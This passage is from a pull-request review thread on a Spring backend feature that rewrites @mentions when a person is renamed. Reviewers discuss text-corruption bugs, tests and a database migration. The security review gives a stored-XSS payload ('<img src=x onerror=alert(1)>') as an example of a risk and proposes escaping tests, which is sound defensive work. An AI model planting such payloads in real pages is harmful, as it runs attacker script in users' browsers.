2. personService.existsById is dead code in the synchronous path.
PersonMentionPropagationListener.java:31:

if (!personService.existsById(event.personId())) {
    log.warn("Skipping mention propagation for non-existent personId {}", event.personId());
    return;
}

The listener is @Transactional (REQUIRED), invoked synchronously from PersonService.updatePerson which is also @Transactional. They share one transaction. The Person row that triggered the event cannot be deleted between publishEvent and the listener's first statement — same thread, same transaction. The check passes 100% of the time. The test noOps_whenPersonIdNoLongerExists constructs the listener directly with a Mockito stub, which is why it can simulate the path — but in production it never fires.

If you intend this as forward-protection for the eventual @TransactionalEventListener(AFTER_COMMIT) + @Async switch, the Javadoc must say so. Otherwise the next person will delete the check (and the test) as obviously redundant. My preference: delete the check now (and the orphan test), and add it back with proper context when you switch to async.

3. Constructor-positional cascade in TranscriptionServiceTest test fixtures.
You added @Builder to both DTOs — good. But the existing TranscriptionServiceTest call sites still use positional constructor:

new UpdateTranscriptionBlockDTO("new text", null, java.util.List.of())
new CreateTranscriptionBlockDTO(1, 0.1, 0.2, 0.3, 0.4, "hello", null, java.util.List.of())

Every new DTO field will require touching these test call sites again. Switch to .builder() in the same PR — it's a 5-line change per call site and you have the builder support already. Worth doing now while the touched lines are still in the diff.

Suggestions

4. The listener does both the text replace AND the sidecar displayName update in one loop. Two responsibilities, one loop body. Extract:

private void applyRenameTo(TranscriptionBlock block, String oldNeedle, String newNeedle, UUID personId, String newDisplayName) {
    rewriteText(block, oldNeedle, newNeedle);
    rewriteSidecarDisplayName(block, personId, newDisplayName);
}

The listener body becomes a 4-line orchestrator and each helper is independently testable.

5. Objects.equals(oldDisplayName, newDisplayName) in PersonService.updatePerson is correct — but the try/catch(OptimisticLockingFailureException) block wraps publishEvent synchronously. The exception originates inside saveAllAndFlush deep in the listener. That works because Spring's REQUIRED propagation re-uses the calling transaction and exceptions bubble up the call stack. Add a unit test that proves this catch is reached when the listener throws — your current updatePerson_throwsConflict_whenListenerSignalsOptimisticLockFailure mocks the publisher throwing, which is one level too high. The real bug surface is the listener's saveAndFlush. Mock that path instead of stubbing the publisher to throw.

What's done well

• TDD evidence is strong: PersonMentionPropagationListenerTest covers happy path, partial-name collision, multiple occurrences, orphaned sidecar, latency floor, and unrelated block — all named as sentences.
• PersonService.updatePerson uses guard clauses and snapshots oldDisplayName at the top, before any setter — clean code.
• DTOs use @Builder.Default with new ArrayList<>() so mentionedPersons is never null — defensive defaults done right.
• @Valid on the field, not just the controller parameter — JSR-303 recurses correctly.
• 200-block latency-floor test is exactly the kind of merge-blocking regression guard that prevents future complacency.

Address #1 (correctness blocker if I am right about single-word displayNames), #2 (dead code or document why it stays), #3 (mechanical — switch to .builder()), and #5 (test the actual exception path). The PR will be a clean approve after that.

## Felix Brandt — Senior Fullstack Developer **Verdict: Approved with concerns** Strong PR. The rename-propagation pipeline is small, has clear seams, and the test coverage looks like it was actually written before the implementation rather than around it. A few things I would want to fix before this lands as the template for future cross-domain listeners. ### Blockers None — but read concern #1 carefully, it is a behavioural correctness gap, not a style issue. ### Concerns **1. `String.replace` rewrite is correct only when `displayName` contains a space.** `PersonMentionPropagationListener.java:46-50`: ```java String oldNeedle = "@" + event.oldDisplayName(); String newNeedle = "@" + event.newDisplayName(); for (TranscriptionBlock block : blocks) { if (block.getText() != null) { block.setText(block.getText().replace(oldNeedle, newNeedle)); } ``` Test `doesNotMatchPartialName_when...` proves that `@Hans Müller` → `@Hans Schmidt` does NOT corrupt `@Hans-Peter Müller` because the full multi-word needle does not match. Good. But: ``` Person displayName = "Hans" (firstName only) Block text = "Letter from @Hans-Peter to @Hans about the meeting." Rename "Hans" → "Johann" Result: "Letter from @Johann-Peter to @Johann about the meeting." // CORRUPTED ``` Single-word displayNames break this. `DisplayNameFormatter` produces a single-word name when one of firstName/lastName is null — verify in `Person.getDisplayName()`. The fix is word-boundary anchoring: ```java String pattern = "(?<![\\w-])@" + Pattern.quote(event.oldDisplayName()) + "(?![\\w-])"; String replacement = "@" + Matcher.quoteReplacement(event.newDisplayName()); block.setText(block.getText().replaceAll(pattern, replacement)); ``` **Add a failing test first** (`rewritesText_whenSingleWordDisplayName_doesNotCorruptOverlappingMention`), then make it pass with `replaceAll` + word boundary. Without this, the listener has a silent corruption path. **2. `personService.existsById` is dead code in the synchronous path.** `PersonMentionPropagationListener.java:31`: ```java if (!personService.existsById(event.personId())) { log.warn("Skipping mention propagation for non-existent personId {}", event.personId()); return; } ``` The listener is `@Transactional` (REQUIRED), invoked synchronously from `PersonService.updatePerson` which is also `@Transactional`. They share one transaction. The Person row that triggered the event cannot be deleted between `publishEvent` and the listener's first statement — same thread, same transaction. The check passes 100% of the time. The test `noOps_whenPersonIdNoLongerExists` constructs the listener directly with a Mockito stub, which is why it can simulate the path — but in production it never fires. If you intend this as forward-protection for the eventual `@TransactionalEventListener(AFTER_COMMIT) + @Async` switch, **the Javadoc must say so**. Otherwise the next person will delete the check (and the test) as obviously redundant. My preference: delete the check now (and the orphan test), and add it back with proper context when you switch to async. **3. Constructor-positional cascade in `TranscriptionServiceTest` test fixtures.** You added `@Builder` to both DTOs — good. But the existing TranscriptionServiceTest call sites still use positional constructor: ```java new UpdateTranscriptionBlockDTO("new text", null, java.util.List.of()) new CreateTranscriptionBlockDTO(1, 0.1, 0.2, 0.3, 0.4, "hello", null, java.util.List.of()) ``` Every new DTO field will require touching these test call sites again. Switch to `.builder()` in the same PR — it's a 5-line change per call site and you have the builder support already. Worth doing now while the touched lines are still in the diff. ### Suggestions **4. The listener does both the text replace AND the sidecar displayName update in one loop.** Two responsibilities, one loop body. Extract: ```java private void applyRenameTo(TranscriptionBlock block, String oldNeedle, String newNeedle, UUID personId, String newDisplayName) { rewriteText(block, oldNeedle, newNeedle); rewriteSidecarDisplayName(block, personId, newDisplayName); } ``` The listener body becomes a 4-line orchestrator and each helper is independently testable. **5. `Objects.equals(oldDisplayName, newDisplayName)` in `PersonService.updatePerson` is correct** — but the `try/catch(OptimisticLockingFailureException)` block wraps `publishEvent` synchronously. The exception originates inside `saveAllAndFlush` deep in the listener. That works because Spring's REQUIRED propagation re-uses the calling transaction and exceptions bubble up the call stack. **Add a unit test that proves this catch is reached when the listener throws** — your current `updatePerson_throwsConflict_whenListenerSignalsOptimisticLockFailure` mocks the *publisher* throwing, which is one level too high. The real bug surface is the listener's saveAndFlush. Mock that path instead of stubbing the publisher to throw. ### What's done well - TDD evidence is strong: `PersonMentionPropagationListenerTest` covers happy path, partial-name collision, multiple occurrences, orphaned sidecar, latency floor, and unrelated block — all named as sentences. - `PersonService.updatePerson` uses guard clauses and snapshots `oldDisplayName` at the top, before any setter — clean code. - DTOs use `@Builder.Default` with `new ArrayList<>()` so `mentionedPersons` is never null — defensive defaults done right. - `@Valid` on the field, not just the controller parameter — JSR-303 recurses correctly. - 200-block latency-floor test is exactly the kind of merge-blocking regression guard that prevents future complacency. Address #1 (correctness blocker if I am right about single-word displayNames), #2 (dead code or document why it stays), #3 (mechanical — switch to `.builder()`), and #5 (test the actual exception path). The PR will be a clean approve after that.

marcel commented 2026-04-28 21:16:34 +02:00

Author

Owner

Copy Link

Nora "NullX" Steiner — Application Security Engineer

Verdict: Approved with concerns

Auth posture, input validation, and SQL injection surface are all clean. The interesting attack surface in this PR is the stored-content rewrite path that fires on every Person rename. I want to flag two findings — one is a contract assertion that the frontend (PR-B) must honour, the other is a privacy nuance worth documenting.

Blockers

None at the backend layer. The two concerns below become blockers if the frontend doesn't carry its half.

Concerns

1. Stored XSS contract — displayName flows into block.text via String.replace. Sanitization is the consumer's responsibility.

PersonService.updatePerson accepts dto.getFirstName(), dto.getLastName(), etc. without HTML-encoding. Person.getDisplayName() returns whatever was stored. The propagation listener then does:

block.setText(block.getText().replace("@" + oldName, "@" + newName));

If a WRITE_ALL user renames a person to <img src=x onerror=alert(1)>, that string is now persisted into every transcription block that mentioned them. The @Size(max=200) cap on displayName limits payload length but does not constrain content.

Trust model: only WRITE_ALL users can rename. Same trust tier can already edit block.text directly. So this is not a privilege escalation — it is a stored-XSS vector that already exists for block.text itself. The PR description states the frontend will introduce escapeHtml and renderTranscriptionBody in PR-B. That is the right answer and it must hold.

Action: When PR-B lands, verify that:

• block.text is rendered via textContent (or {@html} only after passing through the escapeHtml + structured tokenizer)
• PersonHoverCard and PersonMentionEditor HTML-escape the displayName before injecting it into the DOM
• The Paraglide error message itself does not interpolate user-controlled displayName

I am OK approving the backend half on the explicit promise that PR-B handles this. Worth a CWE-79 unit test in PR-B's personMention.test.ts (renderTranscriptionBody escapes <script> in displayName).

2. Privacy: deleted-person mentions persist as plain text. Migration V56 says this is by design — agreed, but worth a "right to be forgotten" comment.

The sidecar table has ON DELETE CASCADE on block_id but no FK on person_id — explicitly chosen so deleted persons degrade to plain @Auguste Raddatz text inside the transcription. From a data-integrity standpoint, fine. From a GDPR / "right to be forgotten" standpoint, person deletion does not erase the person's name from the archive — every transcription block they were mentioned in still carries their name, both in block.text and in the orphaned sidecar row.

For a private family archive (your stated context), this is acceptable and probably desired (historical record preservation). For any future external user this is a privacy gap. Two suggestions:

• Add a comment in PersonService.deletePerson explicitly noting that mention text is NOT scrubbed and pointing to the V56 migration rationale.
• Consider a follow-up issue: an admin-only "scrub mentions of deleted person" action that nulls out the orphaned sidecar entries and rewrites @DeletedName → [entfernt] in matching block.text. Not blocking; tracking would be enough.

Suggestions

3. PersonMention.displayName length-cap test exists for create. Add the same for update.
createBlock_returns400_whenMentionedPersonDisplayNameExceeds200Chars is the regression guard for CreateTranscriptionBlockDTO. The same @Valid recursion applies to UpdateTranscriptionBlockDTO but there is no parallel test. If someone removes @Valid from the update endpoint in a refactor, only the create path catches it. Mirror the test for PUT /api/documents/{id}/transcription-blocks/{blockId}.

4. CWE-79 regression test for the rename pipeline.
Even though sanitization is the frontend's job, a backend test that proves the listener does not apply any encoding/decoding to the displayName during rewrite is worth having — otherwise a future "helpful" sanitization in the listener would silently change semantics. One assertion: rename Auguste → <b>Augusta</b>, verify the rewritten block.text contains the literal <b> characters.

What's done well

• Adding @RequirePermission(Permission.READ_ALL) to PersonController.getPersons() and getPerson() — defense in depth; the explanation in the PR description (hover card surfaces life dates, notes, family relationships) is exactly the right reasoning. The corresponding 401/403 tests are present and use the right patterns (@WithMockUser without authorities for 403, @WithMockUser(authorities = "READ_ALL") for 200).
• JPQL injection surface: zero. The new derived query findByMentionedPersons_PersonId(UUID) is method-name-derived; Spring Data generates parameterized SQL.
• Optimistic-lock translation to DomainException.conflict(PERSON_RENAME_CONFLICT) with proper 409 — atomic rollback, structured error code, mirrored in frontend errors.ts + Paraglide. No silent failure mode.
• @Size(max=200) on displayName — bounds DoS payload size at the API boundary.
• Migration V56 has no FK on person_id intentionally, with the rationale documented inline. That documentation is what stops a future reviewer from "fixing" it.
• SLF4J parameterized logging in the listener ({} placeholders, never string concatenation) — Log4Shell-safe.

Approve once concern #1 is operationally tracked (PR-B integration verification) and #2 has at least the comment in PersonService.deletePerson. Concerns #3 and #4 are nice-to-haves but I would push for them in the same PR.

## Nora "NullX" Steiner — Application Security Engineer **Verdict: Approved with concerns** Auth posture, input validation, and SQL injection surface are all clean. The interesting attack surface in this PR is the **stored-content rewrite path** that fires on every Person rename. I want to flag two findings — one is a contract assertion that the frontend (PR-B) must honour, the other is a privacy nuance worth documenting. ### Blockers None at the backend layer. The two concerns below become blockers if the frontend doesn't carry its half. ### Concerns **1. Stored XSS contract — `displayName` flows into `block.text` via `String.replace`. Sanitization is the consumer's responsibility.** `PersonService.updatePerson` accepts `dto.getFirstName()`, `dto.getLastName()`, etc. without HTML-encoding. `Person.getDisplayName()` returns whatever was stored. The propagation listener then does: ```java block.setText(block.getText().replace("@" + oldName, "@" + newName)); ``` If a WRITE_ALL user renames a person to `<img src=x onerror=alert(1)>`, that string is now persisted into every transcription block that mentioned them. The `@Size(max=200)` cap on `displayName` limits payload length but does not constrain content. Trust model: only WRITE_ALL users can rename. Same trust tier can already edit `block.text` directly. So this is **not a privilege escalation** — it is a stored-XSS vector that already exists for `block.text` itself. **The PR description states the frontend will introduce `escapeHtml` and `renderTranscriptionBody` in PR-B.** That is the right answer and it must hold. **Action**: When PR-B lands, verify that: - `block.text` is rendered via `textContent` (or `{@html}` only after passing through the escapeHtml + structured tokenizer) - `PersonHoverCard` and `PersonMentionEditor` HTML-escape the `displayName` before injecting it into the DOM - The Paraglide error message itself does not interpolate user-controlled `displayName` I am OK approving the backend half on the explicit promise that PR-B handles this. Worth a CWE-79 unit test in PR-B's `personMention.test.ts` (`renderTranscriptionBody escapes <script> in displayName`). **2. Privacy: deleted-person mentions persist as plain text. Migration V56 says this is by design — agreed, but worth a "right to be forgotten" comment.** The sidecar table has `ON DELETE CASCADE` on `block_id` but **no FK on `person_id`** — explicitly chosen so deleted persons degrade to plain `@Auguste Raddatz` text inside the transcription. From a data-integrity standpoint, fine. From a GDPR / "right to be forgotten" standpoint, **person deletion does not erase the person's name from the archive** — every transcription block they were mentioned in still carries their name, both in `block.text` and in the orphaned sidecar row. For a private family archive (your stated context), this is acceptable and probably desired (historical record preservation). For any future external user this is a privacy gap. Two suggestions: - Add a comment in `PersonService.deletePerson` explicitly noting that mention text is NOT scrubbed and pointing to the V56 migration rationale. - Consider a follow-up issue: an admin-only "scrub mentions of deleted person" action that nulls out the orphaned sidecar entries and rewrites `@DeletedName` → `[entfernt]` in matching block.text. Not blocking; tracking would be enough. ### Suggestions **3. `PersonMention.displayName` length-cap test exists for create. Add the same for update.** `createBlock_returns400_whenMentionedPersonDisplayNameExceeds200Chars` is the regression guard for `CreateTranscriptionBlockDTO`. The same `@Valid` recursion applies to `UpdateTranscriptionBlockDTO` but there is no parallel test. If someone removes `@Valid` from the update endpoint in a refactor, only the create path catches it. Mirror the test for `PUT /api/documents/{id}/transcription-blocks/{blockId}`. **4. CWE-79 regression test for the rename pipeline.** Even though sanitization is the frontend's job, a backend test that proves the listener does **not** apply any encoding/decoding to the displayName during rewrite is worth having — otherwise a future "helpful" sanitization in the listener would silently change semantics. One assertion: rename `Auguste` → `<b>Augusta</b>`, verify the rewritten `block.text` contains the literal `<b>` characters. ### What's done well - **Adding `@RequirePermission(Permission.READ_ALL)` to `PersonController.getPersons()` and `getPerson()`** — defense in depth; the explanation in the PR description (hover card surfaces life dates, notes, family relationships) is exactly the right reasoning. The corresponding 401/403 tests are present and use the right patterns (`@WithMockUser` without authorities for 403, `@WithMockUser(authorities = "READ_ALL")` for 200). - JPQL injection surface: zero. The new derived query `findByMentionedPersons_PersonId(UUID)` is method-name-derived; Spring Data generates parameterized SQL. - Optimistic-lock translation to `DomainException.conflict(PERSON_RENAME_CONFLICT)` with proper 409 — atomic rollback, structured error code, mirrored in frontend `errors.ts` + Paraglide. No silent failure mode. - `@Size(max=200)` on `displayName` — bounds DoS payload size at the API boundary. - Migration V56 has no FK on `person_id` *intentionally*, with the rationale documented inline. That documentation is what stops a future reviewer from "fixing" it. - SLF4J parameterized logging in the listener (`{}` placeholders, never string concatenation) — Log4Shell-safe. Approve once concern #1 is operationally tracked (PR-B integration verification) and #2 has at least the comment in `PersonService.deletePerson`. Concerns #3 and #4 are nice-to-haves but I would push for them in the same PR.

marcel commented 2026-04-28 21:17:16 +02:00

Author

Owner

Copy Link

Sara Holt — Senior QA Engineer

Verdict: Approved with concerns

Test pyramid is well-balanced — Mockito unit tests for the publisher logic in PersonService, @DataJpaTest integration tests with Testcontainers for the listener and the repository, and a latency floor at 200 blocks acting as a merge-blocking regression guard. Test names read as sentences, factories are extracted, one assertion per test in most places. There are real gaps, however, and one of them is the test that would have caught the strongest correctness risk in this PR.

Blockers

None.

Concerns

1. Missing edge-case test: single-word displayName.
Every test in PersonMentionPropagationListenerTest uses a person with both firstName AND lastName (Auguste Raddatz, Hans Müller, Hans-Peter Müller). Person.getDisplayName() produces a multi-word string with a space inside, which means String.replace("@Auguste Raddatz", "@Augusta Raddatz") cannot match @Auguste-Raddatz-Schmidt or any other extended mention.

Add this test (it should fail today):

@Test
void rewritesText_whenSingleWordDisplayName_doesNotCorruptOverlappingMention() {
    UUID hansId = savedPersonId(null, "Hans");          // single-word: "Hans"
    UUID hansPeterId = savedPersonId("Hans-Peter", "Müller");
    TranscriptionBlock saved = saveBlock(
        "Heute hat @Hans-Peter Müller mit @Hans gesprochen.",
        List.of(
            new PersonMention(hansPeterId, "Hans-Peter Müller"),
            new PersonMention(hansId, "Hans")));
    em.clear();

    listener.onPersonDisplayNameChanged(
        new PersonDisplayNameChangedEvent(hansId, "Hans", "Johann"));
    blockRepository.flush(); em.clear();

    TranscriptionBlock reloaded = blockRepository.findById(saved.getId()).orElseThrow();
    assertThat(reloaded.getText())
        .as("Renaming single-word @Hans must NOT corrupt @Hans-Peter Müller")
        .isEqualTo("Heute hat @Hans-Peter Müller mit @Johann gesprochen.");
}

This is the test that proves the corruption window I am worried about. If Person.getDisplayName() allows a single-word return value (it does, when firstName is null), this currently corrupts other mentions. Make it red, then green.

2. Test setup duplication between TranscriptionBlockMentionsRepositoryTest and PersonMentionPropagationListenerTest.
Both classes have near-identical @BeforeEach building a Document + DocumentAnnotation fixture, and both define a private saveBlock helper. Extract to a shared TranscriptionTestFixtures utility class. Three tests currently, but PR-B will add more — the duplication compounds.

3. The optimistic-lock test mocks the publisher, not the listener's saveAllAndFlush.
PersonServiceTest.updatePerson_throwsConflict_whenListenerSignalsOptimisticLockFailure does:

doThrow(new OptimisticLockingFailureException(...))
    .when(eventPublisher).publishEvent(any(PersonDisplayNameChangedEvent.class));

This proves the catch in PersonService.updatePerson works when the publisher throws. But in production the exception originates from the listener's blockRepository.saveAllAndFlush(blocks) call, which is two stack frames deeper. The current test would still pass if someone replaced saveAllAndFlush with a no-op — the mocked publisher throws independently of the listener body.

The PR's spec-deviation note already acknowledges that an end-to-end optimistic-lock reproduction in @DataJpaTest is impractical. I accept that. But the unit test should at least exercise the listener throwing path:

• Mock blockRepository.saveAllAndFlush to throw OptimisticLockingFailureException
• Invoke the listener directly (it's already separately testable in PersonMentionPropagationListenerTest)
• Assert the exception propagates out of the listener method unchanged

That's the missing half of the test pair.

4. Latency floor test: 2 seconds for 200 blocks is generous.
propagatesAcross200Blocks_inUnderTwoSeconds_latencyFloor allows up to 10ms per block including JPA dirty-checking, flush, and audit logging. Testcontainers cold-start aside, on a healthy CI runner this should complete in 200–400ms. A 2-second floor catches catastrophic regressions (someone adds an N+1 query inside the loop) but not incremental ones (someone adds a 5ms-per-block check). Suggest tightening to 1 second after observing 5–10 CI runs to get a stable baseline. Keep it as as("...merge-blocking regression floor") — that messaging is exactly right.

Suggestions

5. Constructor-positional cascade in TranscriptionServiceTest.
The DTO change ripples through ~7 existing tests that now end with ..., java.util.List.of()). Felix is right to flag the builder migration — but from a QA standpoint, stop using positional constructors in new test fixtures. A fixture factory using .builder() would have absorbed this change in one place.

6. Verify the propagation listener integration in CI explicitly.
The listener is @EventListener so it only fires when Spring's event publisher is wired. The current tests construct it manually (new PersonMentionPropagationListener(...)). A single @SpringBootTest smoke test that does a real personService.updatePerson and asserts the block text changed would prove the wiring end-to-end. Five lines, runs once, catches "someone removed @EventListener" forever.

7. Test the negative @Valid recursion for the UPDATE endpoint.
Backend test createBlock_returns400_whenMentionedPersonDisplayNameExceeds200Chars exists. There is no parallel updateBlock_returns400_whenMentionedPersonDisplayNameExceeds200Chars. Mirror it. Symmetric API surface deserves symmetric test coverage.

What's done well

• Test pyramid is at the right shape: unit (Mockito for PersonService), integration (@DataJpaTest with real Postgres for repository + listener), no E2E for this slice (correct — E2E is for user journeys, not data-layer rename pipelines).
• @DataJpaTest + Import(PostgresContainerConfig.class, FlywayConfig.class) is the canonical setup. No H2 anywhere in this PR. Migrations run end-to-end against real Postgres.
• Test names are full sentences: rewritesText_andSidecar_whenSingleBlockReferencesRenamedPerson, doesNotMatchPartialName_whenAnotherMentionShares_a_substring_with_renamed_person. CI failures will be self-describing.
• Factory functions (saveBlock, savedPersonId) extracted at the top of each test class — setup is one-line-per-thing.
• One logical assertion per test in most cases, with .as("...") annotations on assertions that need context (the latency floor).
• No Thread.sleep, no @Disabled, no flaky test smells.
• 1446/1446 backend tests green as stated in the PR description — that level of test discipline is what makes this codebase fast to change.

Address #1 (single-word displayName test) and #3 (test the listener's throw path), and this is a clean approve. The rest are improvements I'd love to see in the same PR but won't block on.

## Sara Holt — Senior QA Engineer **Verdict: Approved with concerns** Test pyramid is well-balanced — Mockito unit tests for the publisher logic in `PersonService`, `@DataJpaTest` integration tests with Testcontainers for the listener and the repository, and a latency floor at 200 blocks acting as a merge-blocking regression guard. Test names read as sentences, factories are extracted, one assertion per test in most places. There are real gaps, however, and one of them is the test that would have caught the strongest correctness risk in this PR. ### Blockers None. ### Concerns **1. Missing edge-case test: single-word `displayName`.** Every test in `PersonMentionPropagationListenerTest` uses a person with both `firstName` AND `lastName` (`Auguste Raddatz`, `Hans Müller`, `Hans-Peter Müller`). `Person.getDisplayName()` produces a multi-word string with a space inside, which means `String.replace("@Auguste Raddatz", "@Augusta Raddatz")` cannot match `@Auguste-Raddatz-Schmidt` or any other extended mention. **Add this test (it should fail today)**: ```java @Test void rewritesText_whenSingleWordDisplayName_doesNotCorruptOverlappingMention() { UUID hansId = savedPersonId(null, "Hans"); // single-word: "Hans" UUID hansPeterId = savedPersonId("Hans-Peter", "Müller"); TranscriptionBlock saved = saveBlock( "Heute hat @Hans-Peter Müller mit @Hans gesprochen.", List.of( new PersonMention(hansPeterId, "Hans-Peter Müller"), new PersonMention(hansId, "Hans"))); em.clear(); listener.onPersonDisplayNameChanged( new PersonDisplayNameChangedEvent(hansId, "Hans", "Johann")); blockRepository.flush(); em.clear(); TranscriptionBlock reloaded = blockRepository.findById(saved.getId()).orElseThrow(); assertThat(reloaded.getText()) .as("Renaming single-word @Hans must NOT corrupt @Hans-Peter Müller") .isEqualTo("Heute hat @Hans-Peter Müller mit @Johann gesprochen."); } ``` This is the test that proves the corruption window I am worried about. If `Person.getDisplayName()` allows a single-word return value (it does, when `firstName` is null), this currently corrupts other mentions. **Make it red, then green.** **2. Test setup duplication between `TranscriptionBlockMentionsRepositoryTest` and `PersonMentionPropagationListenerTest`.** Both classes have near-identical `@BeforeEach` building a `Document + DocumentAnnotation` fixture, and both define a private `saveBlock` helper. Extract to a shared `TranscriptionTestFixtures` utility class. Three tests currently, but PR-B will add more — the duplication compounds. **3. The optimistic-lock test mocks the publisher, not the listener's `saveAllAndFlush`.** `PersonServiceTest.updatePerson_throwsConflict_whenListenerSignalsOptimisticLockFailure` does: ```java doThrow(new OptimisticLockingFailureException(...)) .when(eventPublisher).publishEvent(any(PersonDisplayNameChangedEvent.class)); ``` This proves the **catch** in `PersonService.updatePerson` works when the publisher throws. But in production the exception originates from the listener's `blockRepository.saveAllAndFlush(blocks)` call, which is two stack frames deeper. The current test would still pass if someone replaced `saveAllAndFlush` with a no-op — the mocked publisher throws independently of the listener body. The PR's spec-deviation note already acknowledges that an end-to-end optimistic-lock reproduction in `@DataJpaTest` is impractical. I accept that. But the unit test should at least exercise the **listener throwing** path: - Mock `blockRepository.saveAllAndFlush` to throw `OptimisticLockingFailureException` - Invoke the listener directly (it's already separately testable in `PersonMentionPropagationListenerTest`) - Assert the exception propagates out of the listener method unchanged That's the missing half of the test pair. **4. Latency floor test: 2 seconds for 200 blocks is generous.** `propagatesAcross200Blocks_inUnderTwoSeconds_latencyFloor` allows up to 10ms per block including JPA dirty-checking, flush, and audit logging. Testcontainers cold-start aside, on a healthy CI runner this should complete in 200–400ms. A 2-second floor catches catastrophic regressions (someone adds an N+1 query inside the loop) but not incremental ones (someone adds a 5ms-per-block check). Suggest tightening to 1 second after observing 5–10 CI runs to get a stable baseline. Keep it as `as("...merge-blocking regression floor")` — that messaging is exactly right. ### Suggestions **5. Constructor-positional cascade in `TranscriptionServiceTest`.** The DTO change ripples through ~7 existing tests that now end with `..., java.util.List.of())`. Felix is right to flag the builder migration — but from a QA standpoint, **stop using positional constructors in new test fixtures.** A fixture factory using `.builder()` would have absorbed this change in one place. **6. Verify the propagation listener integration in CI explicitly.** The listener is `@EventListener` so it only fires when Spring's event publisher is wired. The current tests construct it manually (`new PersonMentionPropagationListener(...)`). A single `@SpringBootTest` smoke test that does a real `personService.updatePerson` and asserts the block text changed would prove the wiring end-to-end. Five lines, runs once, catches "someone removed `@EventListener`" forever. **7. Test the negative `@Valid` recursion for the UPDATE endpoint.** Backend test `createBlock_returns400_whenMentionedPersonDisplayNameExceeds200Chars` exists. There is no parallel `updateBlock_returns400_whenMentionedPersonDisplayNameExceeds200Chars`. Mirror it. Symmetric API surface deserves symmetric test coverage. ### What's done well - **Test pyramid is at the right shape**: unit (Mockito for `PersonService`), integration (`@DataJpaTest` with real Postgres for repository + listener), no E2E for this slice (correct — E2E is for user journeys, not data-layer rename pipelines). - **`@DataJpaTest + Import(PostgresContainerConfig.class, FlywayConfig.class)`** is the canonical setup. No H2 anywhere in this PR. Migrations run end-to-end against real Postgres. - **Test names are full sentences**: `rewritesText_andSidecar_whenSingleBlockReferencesRenamedPerson`, `doesNotMatchPartialName_whenAnotherMentionShares_a_substring_with_renamed_person`. CI failures will be self-describing. - **Factory functions** (`saveBlock`, `savedPersonId`) extracted at the top of each test class — setup is one-line-per-thing. - **One logical assertion per test** in most cases, with `.as("...")` annotations on assertions that need context (the latency floor). - **No `Thread.sleep`, no `@Disabled`, no flaky test smells.** - **1446/1446 backend tests green** as stated in the PR description — that level of test discipline is what makes this codebase fast to change. Address #1 (single-word displayName test) and #3 (test the listener's throw path), and this is a clean approve. The rest are improvements I'd love to see in the same PR but won't block on.

marcel commented 2026-04-28 21:17:43 +02:00

Author

Owner

Copy Link

Tobias Wendt — DevOps & Platform Engineer

Verdict: Approved

This PR is light on infrastructure surface area — backend code, JPA, one Flyway migration, frontend type regen. There is nothing to deploy differently and no Compose / CI / Caddy changes. I checked the things that DO concern my role:

What I checked

1. Flyway migration V56 — is it deployment-safe?

• File name V56__add_transcription_block_mentioned_persons.sql follows the established versioning convention (last shipped is V55 implicitly).
• CREATE TABLE and two CREATE INDEX statements. New table, no ALTER on existing tables, no data backfill, no triggers — instant deployment, no migration window risk.
• Indexes are CREATE INDEX (not CONCURRENTLY). For an empty new table this is irrelevant — locks an empty table for nanoseconds. Fine.
• ON DELETE CASCADE on block_id is the right choice — when a transcription block disappears, its sidecar mentions go with it. No orphaned-by-block rows.
• VARCHAR(200) cap matches the JPA @Size(max=200) and @Column(length=200) — no schema/code mismatch.

2. Backup/restore impact. New table will be picked up by the existing pg_dump strategy automatically. No special handling needed. Restore tests will validate the round-trip on the next monthly run.

3. CI impact. Backend test count went from N to N+~10 with two @DataJpaTest classes. Testcontainers Postgres is already in the cache; cold-start is ~3s, warm <500ms. Net CI delta probably 5–15 seconds. Acceptable.

4. Frontend api.ts regeneration. The PR description correctly notes this required --spring.profiles.active=dev for the SpringDoc endpoint to be reachable. Good — production never exposes /v3/api-docs. Verified: regenerated file is committed; PR-B is blocked on this PR merging, which is the right ordering.

5. Container image impact. No new dependencies, no Dockerfile changes. Backend JAR will be marginally larger (~few KB) from the new classes. No-op for image build time and image size.

Suggestions

1. Migration coverage in CI. Confirm that MigrationIntegrationTest (or whatever runs Flyway top-to-bottom against a fresh Testcontainers Postgres) ran V56 and passed in your local ./mvnw test. The two new @DataJpaTest classes use @Import(FlywayConfig.class) which suggests Flyway runs — but it's worth one explicit check that V56 is present in the migration list applied during CI. This is the kind of thing that breaks silently when someone forgets to push the SQL file.

2. Consider adding a pg_stat_user_indexes check in your monthly DB report. Once V56 is in production, idx_tbmp_person_id and idx_tbmp_block_id should both show non-zero idx_scan counts (assuming the rename feature is used). If after a month you see one of them at zero, you have an unused index burning write amplification — drop it. Standard hygiene; not specific to this PR.

3. No new env vars, no new secrets, no new ports, no new services. Confirmed by grep through the diff. Production deployment is a regular docker compose pull && docker compose up -d backend with the migration applying on backend startup.

What's done well

• Migration is idempotent in shape: pure DDL, no UPSERT, no data manipulation. Re-running is impossible (Flyway tracks flyway_schema_history) but if it were re-run manually it would just fail loudly on the duplicate table.
• No :latest tags introduced anywhere. The PR doesn't touch images, but a quick scan of the diff for image references confirms no Compose changes.
• Migration comment block explains why there's no FK on person_id and why @ElementCollection over JSONB. Future operators reading this migration during an incident will understand the schema choice without context-switching to the PR description.
• The migration follows the established naming pattern (idx_tbmp_*) — matches what's already in db/migration/.

Nothing to fix from my side. Ship it once the application-layer reviewers are happy.

## Tobias Wendt — DevOps & Platform Engineer **Verdict: Approved** This PR is light on infrastructure surface area — backend code, JPA, one Flyway migration, frontend type regen. There is nothing to deploy differently and no Compose / CI / Caddy changes. I checked the things that DO concern my role: ### What I checked **1. Flyway migration V56 — is it deployment-safe?** - File name `V56__add_transcription_block_mentioned_persons.sql` follows the established versioning convention (last shipped is V55 implicitly). - `CREATE TABLE` and two `CREATE INDEX` statements. New table, no `ALTER` on existing tables, no data backfill, no triggers — instant deployment, no migration window risk. - Indexes are `CREATE INDEX` (not `CONCURRENTLY`). For an empty new table this is irrelevant — locks an empty table for nanoseconds. Fine. - `ON DELETE CASCADE` on `block_id` is the right choice — when a transcription block disappears, its sidecar mentions go with it. No orphaned-by-block rows. - VARCHAR(200) cap matches the JPA `@Size(max=200)` and `@Column(length=200)` — no schema/code mismatch. **2. Backup/restore impact.** New table will be picked up by the existing `pg_dump` strategy automatically. No special handling needed. Restore tests will validate the round-trip on the next monthly run. **3. CI impact.** Backend test count went from N to N+~10 with two `@DataJpaTest` classes. Testcontainers Postgres is already in the cache; cold-start is ~3s, warm <500ms. Net CI delta probably 5–15 seconds. Acceptable. **4. Frontend `api.ts` regeneration.** The PR description correctly notes this required `--spring.profiles.active=dev` for the SpringDoc endpoint to be reachable. Good — production 